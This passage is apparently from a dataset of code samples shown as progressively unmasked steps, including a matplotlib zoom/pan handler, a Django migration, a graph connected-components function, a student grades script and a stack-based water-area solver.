curr_ylim[0]\n xmax = curr_xlim[1] - xdata\n ymax = curr_ylim[1] - ydata\n xlim = ylim = []\n if event.button == 'up':\n xlim = [xdata - xmin / self.scale_factor, xdata + xmax /\n self.scale_factor]\n ylim = [ydata - ymin / self.scale_factor, ydata + ymax /\n self.scale_factor]\n elif event.button == 'down':\n xlim = [xdata - xmin * self.scale_factor, xdata + xmax *\n self.scale_factor]\n ylim = [ydata - ymin * self.scale_factor, ydata + ymax *\n self.scale_factor]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_button(self, event):\n if not event.inaxes or event.button != self.mouse_button:\n return\n self._press_coords = event.xdata, event.ydata\n\n def _cb_mouse_release(self, event):\n self._press_coords = None\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_motion(self, event):\n if not event.inaxes or not self._press_coords:\n return\n xlim = self.axes.get_xlim()\n ylim = self.axes.get_ylim()\n xlim -= event.xdata - self._press_coords[0]\n ylim -= event.ydata - self._press_coords[1]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _connect_cb(self):\n fig = self.axes.figure\n self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',\n self._cb_mouse_wheel)\n self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',\n self._cb_mouse_button)\n self._cb_mouse_release_id = fig.canvas.mpl_connect(\n 'button_release_event', self._cb_mouse_release)\n self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'\n , self._cb_mouse_motion)\n\n def _disconnect_cb(self):\n fig = self.axes.figure\n if 
self._cb_mouse_wheel_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)\n self._cb_mouse_wheel_id = None\n if self._cb_mouse_button_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_button_id)\n self._cb_mouse_button_id = None\n if self._cb_mouse_release_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_release_id)\n self._cb_mouse_release_id = None\n if self._cb_mouse_motion_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)\n self._cb_mouse_motion_id = None\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ZoomPanHandler:\n \"\"\"\n Matplotlib callback class to handle pan and zoom events.\n \"\"\"\n\n def __init__(self, axes, scale_factor=2, mouse_button=2):\n \"\"\"\n Default constructor for the ZoomPanHandler class.\n\n Parameters\n axes: matplotlib.backend_bases.Axes\n The axes to attach this handler to.\n scale_factor: number\n The scale factor to apply when zooming.\n mouse_button: number or string\n The mouse button used to activate the pan action. Default value is\n 2, meaning the middle mouse button.\n \"\"\"\n self._axes = axes\n self._scale_factor = scale_factor\n self._mouse_button = mouse_button\n self._press_coords = None\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n self._cb_mouse_wheel_id = None\n self._cb_mouse_button_id = None\n self._cb_mouse_release_id = None\n self._cb_mouse_motion_id = None\n self._connect_cb()\n\n def __del__(self):\n self._disconnect_cb()\n self._axes = None\n\n @property\n def axes(self):\n return self._axes\n\n @property\n def scale_factor(self):\n return self._scale_factor\n\n @property\n def mouse_button(self):\n return self._mouse_button\n\n def apply_transforms(self):\n \"\"\"\n Applies the zoom and pan transforms to the axes. Useful after reseting\n the plot.\n \"\"\"\n self.axes.set_xlim(self._curr_xlim)\n self.axes.set_ylim(self._curr_ylim)\n\n def set_base_transforms(self):\n \"\"\"\n Queries the current axis limits and stores them.\n \"\"\"\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n def _cb_mouse_wheel(self, event):\n if event.inaxes:\n curr_xlim = self.axes.get_xlim()\n curr_ylim = self.axes.get_ylim()\n xdata = event.xdata\n ydata = event.ydata\n xmin = xdata - curr_xlim[0]\n ymin = ydata - curr_ylim[0]\n xmax = curr_xlim[1] - xdata\n ymax = curr_ylim[1] - ydata\n xlim = ylim = []\n if event.button == 'up':\n xlim = [xdata - xmin / self.scale_factor, xdata + xmax /\n self.scale_factor]\n ylim = [ydata - ymin / self.scale_factor, ydata + ymax /\n self.scale_factor]\n elif event.button == 'down':\n xlim = [xdata - xmin * self.scale_factor, xdata + xmax *\n self.scale_factor]\n ylim = [ydata - ymin * self.scale_factor, ydata + ymax *\n self.scale_factor]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_button(self, event):\n if not event.inaxes or event.button != self.mouse_button:\n return\n self._press_coords = event.xdata, event.ydata\n\n def _cb_mouse_release(self, event):\n self._press_coords = None\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_motion(self, event):\n if not event.inaxes or not self._press_coords:\n return\n xlim = self.axes.get_xlim()\n ylim = self.axes.get_ylim()\n xlim -= event.xdata - self._press_coords[0]\n ylim -= event.ydata - self._press_coords[1]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _connect_cb(self):\n fig = self.axes.figure\n self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',\n self._cb_mouse_wheel)\n self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',\n self._cb_mouse_button)\n self._cb_mouse_release_id = fig.canvas.mpl_connect(\n 'button_release_event', self._cb_mouse_release)\n self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'\n , self._cb_mouse_motion)\n\n def _disconnect_cb(self):\n fig = self.axes.figure\n if 
self._cb_mouse_wheel_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)\n self._cb_mouse_wheel_id = None\n if self._cb_mouse_button_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_button_id)\n self._cb_mouse_button_id = None\n if self._cb_mouse_release_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_release_id)\n self._cb_mouse_release_id = None\n if self._cb_mouse_motion_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)\n self._cb_mouse_motion_id = None\n\n\ndef main():\n import matplotlib.pyplot as plt\n fig = plt.figure()\n axes = fig.add_subplot(111)\n axes.scatter(x=np.arange(0, 10, 0.5), y=np.arange(0, 20, 1), color='r',\n marker='o')\n hand = ZoomPanHandler(axes, scale_factor=1.5)\n plt.show()\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\n\n\nclass ZoomPanHandler:\n \"\"\"\n Matplotlib callback class to handle pan and zoom events.\n \"\"\"\n\n def __init__(self, axes, scale_factor=2, mouse_button=2):\n \"\"\"\n Default constructor for the ZoomPanHandler class.\n\n Parameters\n axes: matplotlib.backend_bases.Axes\n The axes to attach this handler to.\n scale_factor: number\n The scale factor to apply when zooming.\n mouse_button: number or string\n The mouse button used to activate the pan action. Default value is\n 2, meaning the middle mouse button.\n \"\"\"\n self._axes = axes\n self._scale_factor = scale_factor\n self._mouse_button = mouse_button\n\n self._press_coords = None\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n # Mouse action callback IDs\n self._cb_mouse_wheel_id = None\n self._cb_mouse_button_id = None\n self._cb_mouse_release_id = None\n self._cb_mouse_motion_id = None\n\n self._connect_cb()\n\n def __del__(self):\n self._disconnect_cb()\n self._axes = None\n\n @property\n def axes(self):\n return self._axes\n\n @property\n def scale_factor(self):\n return self._scale_factor\n\n @property\n def mouse_button(self):\n return self._mouse_button\n\n def apply_transforms(self):\n \"\"\"\n Applies the zoom and pan transforms to the axes. Useful after reseting\n the plot.\n \"\"\"\n self.axes.set_xlim(self._curr_xlim)\n self.axes.set_ylim(self._curr_ylim)\n\n def set_base_transforms(self):\n \"\"\"\n Queries the current axis limits and stores them.\n \"\"\"\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n # Private methods\n def _cb_mouse_wheel(self, event):\n if event.inaxes:\n curr_xlim = self.axes.get_xlim()\n curr_ylim = self.axes.get_ylim()\n\n xdata = event.xdata\n ydata = event.ydata\n\n xmin = xdata - curr_xlim[0]\n ymin = ydata - curr_ylim[0]\n\n xmax = curr_xlim[1] - xdata\n ymax = curr_ylim[1] - ydata\n\n xlim = ylim = []\n\n if event.button == 'up': # zoom-in\n xlim = [xdata - xmin / self.scale_factor,\n xdata + xmax / self.scale_factor]\n ylim = [ydata - ymin / self.scale_factor,\n ydata + ymax / self.scale_factor]\n elif event.button == 'down': # zoom-out\n xlim = [xdata - xmin * self.scale_factor,\n xdata + xmax * self.scale_factor]\n ylim = [ydata - ymin * self.scale_factor,\n ydata + ymax * self.scale_factor]\n\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_button(self, event):\n if not event.inaxes or event.button != self.mouse_button:\n return\n self._press_coords = (event.xdata, event.ydata)\n\n def _cb_mouse_release(self, event):\n self._press_coords = None\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_motion(self, event):\n if not event.inaxes or not self._press_coords:\n return\n xlim = self.axes.get_xlim()\n ylim = self.axes.get_ylim()\n xlim -= (event.xdata - self._press_coords[0])\n ylim -= (event.ydata - self._press_coords[1])\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _connect_cb(self):\n fig = self.axes.figure\n self._cb_mouse_wheel_id = fig.canvas.mpl_connect(\n 'scroll_event', self._cb_mouse_wheel)\n self._cb_mouse_button_id = fig.canvas.mpl_connect(\n 'button_press_event', self._cb_mouse_button)\n self._cb_mouse_release_id = fig.canvas.mpl_connect(\n 'button_release_event', self._cb_mouse_release)\n 
self._cb_mouse_motion_id = fig.canvas.mpl_connect(\n 'motion_notify_event', self._cb_mouse_motion)\n\n def _disconnect_cb(self):\n fig = self.axes.figure\n if self._cb_mouse_wheel_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)\n self._cb_mouse_wheel_id = None\n if self._cb_mouse_button_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_button_id)\n self._cb_mouse_button_id = None\n if self._cb_mouse_release_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_release_id)\n self._cb_mouse_release_id = None\n if self._cb_mouse_motion_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)\n self._cb_mouse_motion_id = None\n\n\ndef main():\n import matplotlib.pyplot as plt\n fig = plt.figure()\n axes = fig.add_subplot(111)\n axes.scatter(x=np.arange(0, 10, 0.5), y=np.arange(\n 0, 20, 1), color='r', marker='o')\n hand = ZoomPanHandler(axes, scale_factor=1.5)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
13,
14,
15,
16,
19
]
}
|
[
13,
14,
15,
16,
19
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('PleniApp', '0006_auto_20181203_1144')]
operations = [migrations.CreateModel(name='Comment', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('body', models.TextField()), ('date',
models.DateTimeField(auto_now_add=True))]), migrations.CreateModel(
name='Reply', fields=[('id', models.AutoField(auto_created=True,
primary_key=True, serialize=False, verbose_name='ID')), ('body',
models.TextField()), ('date', models.DateTimeField(auto_now_add=
True)), ('comment', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, to='PleniApp.Comment'))]), migrations.CreateModel
(name='User', fields=[('id', models.AutoField(auto_created=True,
primary_key=True, serialize=False, verbose_name='ID')), ('username',
models.CharField(max_length=50)), ('password', models.CharField(
max_length=50)), ('user_type', models.CharField(default='regular',
max_length=20))]), migrations.AddField(model_name='comment', name=
'user', field=models.ForeignKey(on_delete=django.db.models.deletion
.CASCADE, to='PleniApp.User'))]
<|reserved_special_token_1|>
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [('PleniApp', '0006_auto_20181203_1144')]
operations = [migrations.CreateModel(name='Comment', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('body', models.TextField()), ('date',
models.DateTimeField(auto_now_add=True))]), migrations.CreateModel(
name='Reply', fields=[('id', models.AutoField(auto_created=True,
primary_key=True, serialize=False, verbose_name='ID')), ('body',
models.TextField()), ('date', models.DateTimeField(auto_now_add=
True)), ('comment', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, to='PleniApp.Comment'))]), migrations.CreateModel
(name='User', fields=[('id', models.AutoField(auto_created=True,
primary_key=True, serialize=False, verbose_name='ID')), ('username',
models.CharField(max_length=50)), ('password', models.CharField(
max_length=50)), ('user_type', models.CharField(default='regular',
max_length=20))]), migrations.AddField(model_name='comment', name=
'user', field=models.ForeignKey(on_delete=django.db.models.deletion
.CASCADE, to='PleniApp.User'))]
<|reserved_special_token_1|>
# Generated by Django 2.1 on 2018-12-05 00:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('PleniApp', '0006_auto_20181203_1144'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('body', models.TextField()),
('date', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Reply',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('body', models.TextField()),
('date', models.DateTimeField(auto_now_add=True)),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PleniApp.Comment')),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=50)),
('password', models.CharField(max_length=50)),
('user_type', models.CharField(default='regular', max_length=20)),
],
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PleniApp.User'),
),
]
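# Usage note (a sketch; assumes a standard Django project layout with this file
# saved under PleniApp/migrations/, which is not shown in this dump):
#
#   python manage.py migrate PleniApp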
|
flexible
|
{
"blob_id": "ccb6973910dba5897f6a12be23c74a35e848313b",
"index": 4005,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('PleniApp', '0006_auto_20181203_1144')]\n operations = [migrations.CreateModel(name='Comment', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('body', models.TextField()), ('date',\n models.DateTimeField(auto_now_add=True))]), migrations.CreateModel(\n name='Reply', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('body',\n models.TextField()), ('date', models.DateTimeField(auto_now_add=\n True)), ('comment', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='PleniApp.Comment'))]), migrations.CreateModel\n (name='User', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('username',\n models.CharField(max_length=50)), ('password', models.CharField(\n max_length=50)), ('user_type', models.CharField(default='regular',\n max_length=20))]), migrations.AddField(model_name='comment', name=\n 'user', field=models.ForeignKey(on_delete=django.db.models.deletion\n .CASCADE, to='PleniApp.User'))]\n",
"step-4": "from django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('PleniApp', '0006_auto_20181203_1144')]\n operations = [migrations.CreateModel(name='Comment', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('body', models.TextField()), ('date',\n models.DateTimeField(auto_now_add=True))]), migrations.CreateModel(\n name='Reply', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('body',\n models.TextField()), ('date', models.DateTimeField(auto_now_add=\n True)), ('comment', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='PleniApp.Comment'))]), migrations.CreateModel\n (name='User', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('username',\n models.CharField(max_length=50)), ('password', models.CharField(\n max_length=50)), ('user_type', models.CharField(default='regular',\n max_length=20))]), migrations.AddField(model_name='comment', name=\n 'user', field=models.ForeignKey(on_delete=django.db.models.deletion\n .CASCADE, to='PleniApp.User'))]\n",
"step-5": "# Generated by Django 2.1 on 2018-12-05 00:02\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('PleniApp', '0006_auto_20181203_1144'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('body', models.TextField()),\n ('date', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Reply',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('body', models.TextField()),\n ('date', models.DateTimeField(auto_now_add=True)),\n ('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PleniApp.Comment')),\n ],\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('username', models.CharField(max_length=50)),\n ('password', models.CharField(max_length=50)),\n ('user_type', models.CharField(default='regular', max_length=20)),\n ],\n ),\n migrations.AddField(\n model_name='comment',\n name='user',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PleniApp.User'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def find_components(adjacency_matrix):
visited = set()
components = []
for node in range(len(adjacency_matrix)):
if node not in visited:
component = []
build_component(adjacency_matrix, visited, node, component)
components.append(component)
return components
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def find_components(adjacency_matrix):
visited = set()
components = []
for node in range(len(adjacency_matrix)):
if node not in visited:
component = []
build_component(adjacency_matrix, visited, node, component)
components.append(component)
return components
def build_component(adjacency_matrix, visited, node, component):
visited.add(node)
component.append(node)
for neighbor, value in enumerate(adjacency_matrix[node]):
if value == 1 and neighbor not in visited:
build_component(adjacency_matrix, visited, neighbor, component)
<|reserved_special_token_1|>
"""This module contains an algorithm to find the different
components in a graph represented as an adjacency matrix.
"""
def find_components(adjacency_matrix):
visited = set()
components = []
for node in range(len(adjacency_matrix)):
if node not in visited:
component = []
build_component(adjacency_matrix, visited, node, component)
components.append(component)
return components
def build_component(adjacency_matrix, visited, node, component):
visited.add(node)
component.append(node)
for neighbor, value in enumerate(adjacency_matrix[node]):
if value == 1 and neighbor not in visited:
build_component(adjacency_matrix, visited, neighbor, component)
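# Minimal usage sketch (illustrative matrix, not part of the original module):
# a 4-node graph with a single edge 0-1, so nodes 2 and 3 are singleton components.
if __name__ == '__main__':
    example_matrix = [
        [0, 1, 0, 0],
        [1, 0, 0, 0],
        [0, 0, 0, 0],
        [0, 0, 0, 0],
    ]
    print(find_components(example_matrix))  # -> [[0, 1], [2], [3]]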
|
flexible
|
{
"blob_id": "e71a23ef7a065bc4210e55552e19c83c428bc194",
"index": 3187,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef find_components(adjacency_matrix):\n visited = set()\n components = []\n for node in range(len(adjacency_matrix)):\n if node not in visited:\n component = []\n build_component(adjacency_matrix, visited, node, component)\n components.append(component)\n return components\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef find_components(adjacency_matrix):\n visited = set()\n components = []\n for node in range(len(adjacency_matrix)):\n if node not in visited:\n component = []\n build_component(adjacency_matrix, visited, node, component)\n components.append(component)\n return components\n\n\ndef build_component(adjacency_matrix, visited, node, component):\n visited.add(node)\n component.append(node)\n for neighbor, value in enumerate(adjacency_matrix[node]):\n if value == 1 and neighbor not in visited:\n build_component(adjacency_matrix, visited, neighbor, component)\n",
"step-4": "\"\"\"This module contains an algorithm to find the different\ncomponents in a graph represented as an adjacency matrix.\n\"\"\"\n\n\ndef find_components(adjacency_matrix):\n visited = set()\n components = []\n for node in range(len(adjacency_matrix)):\n if node not in visited:\n component = []\n build_component(adjacency_matrix, visited, node, component)\n components.append(component)\n return components\n\n\ndef build_component(adjacency_matrix, visited, node, component):\n visited.add(node)\n component.append(node)\n for neighbor, value in enumerate(adjacency_matrix[node]):\n if value == 1 and neighbor not in visited:\n build_component(adjacency_matrix, visited, neighbor, component)\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
nome = str(input('Nome: '))
nota1 = float(input('Nota 1: '))
nota2 = float(input('Nota 2: '))
media = (nota1 + nota2) / 2
alunos.append([nome, [nota1, nota2], media])
pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]
if pergunta == 'N':
break
print('-=' * 30)
print(f"{'Nº':<4}{'Nome':<10}{'Média':>8}")
print('-' * 30)
for i, v in enumerate(alunos):
print(f'{i:<4}{v[0]:<10}{v[2]:>8}')
while True:
print('-' * 30)
notas_aluno = int(input(
'Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))
if notas_aluno == 999:
print('Fim do Boletim.')
break
if notas_aluno <= len(alunos) - 1:
print(
f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}'
)
<|reserved_special_token_1|>
alunos = list()
while True:
nome = str(input('Nome: '))
nota1 = float(input('Nota 1: '))
nota2 = float(input('Nota 2: '))
media = (nota1 + nota2) / 2
alunos.append([nome, [nota1, nota2], media])
pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]
if pergunta == 'N':
break
print('-=' * 30)
print(f"{'Nº':<4}{'Nome':<10}{'Média':>8}")
print('-' * 30)
for i, v in enumerate(alunos):
print(f'{i:<4}{v[0]:<10}{v[2]:>8}')
while True:
print('-' * 30)
notas_aluno = int(input(
'Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))
if notas_aluno == 999:
print('Fim do Boletim.')
break
if notas_aluno <= len(alunos) - 1:
print(
f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}'
)
<|reserved_special_token_1|>
# Student report-card script (prompts/output are in Portuguese; English
# translations are given in the comments).
alunos = list()  # each entry: [name, [grade1, grade2], average]
while True:
    nome = str(input('Nome: '))        # "Name: "
    nota1 = float(input('Nota 1: '))   # "Grade 1: "
    nota2 = float(input('Nota 2: '))   # "Grade 2: "
    media = (nota1 + nota2) / 2
    alunos.append([nome, [nota1, nota2], media])
    pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]  # "Continue [Y/N]?"
    if pergunta == 'N':
        break
print('-=' * 30)
print(f'{"Nº":<4}{"Nome":<10}{"Média":>8}')  # header: No. / Name / Average
print('-' * 30)
for i, v in enumerate(alunos):
    print(f'{i:<4}{v[0]:<10}{v[2]:>8}')
while True:
    print('-' * 30)
    # "Show the grades of which student? (Type 999 to quit)"
    notas_aluno = int(input('Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))
    if notas_aluno == 999:
        print('Fim do Boletim.')  # "End of report card."
        break
    if notas_aluno <= len(alunos) - 1:  # note: negative indices are not rejected here
        print(f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}')  # "The grades of X are ..."
|
flexible
|
{
"blob_id": "8dcd4914c58a7ecafdfdd70b698ef3b7141386a6",
"index": 2632,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n nome = str(input('Nome: '))\n nota1 = float(input('Nota 1: '))\n nota2 = float(input('Nota 2: '))\n media = (nota1 + nota2) / 2\n alunos.append([nome, [nota1, nota2], media])\n pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]\n if pergunta == 'N':\n break\nprint('-=' * 30)\nprint(f\"{'Nº':<4}{'Nome':<10}{'Média':>8}\")\nprint('-' * 30)\nfor i, v in enumerate(alunos):\n print(f'{i:<4}{v[0]:<10}{v[2]:>8}')\nwhile True:\n print('-' * 30)\n notas_aluno = int(input(\n 'Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))\n if notas_aluno == 999:\n print('Fim do Boletim.')\n break\n if notas_aluno <= len(alunos) - 1:\n print(\n f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}'\n )\n",
"step-3": "alunos = list()\nwhile True:\n nome = str(input('Nome: '))\n nota1 = float(input('Nota 1: '))\n nota2 = float(input('Nota 2: '))\n media = (nota1 + nota2) / 2\n alunos.append([nome, [nota1, nota2], media])\n pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]\n if pergunta == 'N':\n break\nprint('-=' * 30)\nprint(f\"{'Nº':<4}{'Nome':<10}{'Média':>8}\")\nprint('-' * 30)\nfor i, v in enumerate(alunos):\n print(f'{i:<4}{v[0]:<10}{v[2]:>8}')\nwhile True:\n print('-' * 30)\n notas_aluno = int(input(\n 'Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))\n if notas_aluno == 999:\n print('Fim do Boletim.')\n break\n if notas_aluno <= len(alunos) - 1:\n print(\n f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}'\n )\n",
"step-4": "alunos = list()\nwhile True:\n nome = str(input('Nome: '))\n nota1 = float(input('Nota 1: '))\n nota2 = float(input('Nota 2: '))\n media = (nota1+nota2)/2\n alunos.append([nome, [nota1, nota2], media])\n pergunta = str(input('Quer continuar [S/N]? ')).upper()[0]\n if pergunta == 'N':\n break\nprint('-=' *30)\nprint(f'{\"Nº\":<4}{\"Nome\":<10}{\"Média\":>8}')\nprint('-' *30)\nfor i, v in enumerate(alunos): \n print(f'{i:<4}{v[0]:<10}{v[2]:>8}')\nwhile True:\n print('-' *30)\n notas_aluno = int(input('Mostrar as notas de qual aluno? (Digite 999 para encerrar): '))\n if notas_aluno == 999:\n print('Fim do Boletim.')\n break\n if notas_aluno <= len(alunos)-1:\n print(f'As notas de {alunos[notas_aluno][0]} são {alunos[notas_aluno][1]}')",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#alds13c
from collections import deque
d_stack=deque()
res_stack=deque()
s = input()
for i in range(len(s)):
#print(d_stack,res_stack)
if s[i]=="\\":
d_stack.append(i)
elif s[i]=="/":
if len(d_stack)==0:
continue
left = d_stack.pop()
area = i-left
#res_stack.append((left,area))
if len(res_stack)>0:
flag=True
#merge_candidate = []
mergeareasum=0
while flag:
if len(res_stack)>0 and left<res_stack[-1][0]:
mc = res_stack.pop()
mergeareasum += mc[1]
#res_stack.append((left,under[1]+area))
else:
flag = False
res_stack.append((left,area+mergeareasum))
else:
res_stack.append((left,area))
ans=0
v_devided=[]
for pair in res_stack:
ans += pair[1]
v_devided.append(str(pair[1]))
print(ans)
if len(v_devided)>0:
print(len(v_devided)," ".join(v_devided))
else:
print(0)
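# Worked example (this looks like AOJ ALDS1_3_C, "Areas on the Cross-Section
# Diagram"; the sample below is traced from the code itself):
#   input : \\//
#   output: 4
#           1 4
# i.e. one flooded area with a total size of 4.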
|
normal
|
{
"blob_id": "48e3259698788904e000eb15b5443067b0c3e791",
"index": 5968,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\n<mask token>\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
"step-3": "<mask token>\nd_stack = deque()\nres_stack = deque()\ns = input()\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\nans = 0\nv_devided = []\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
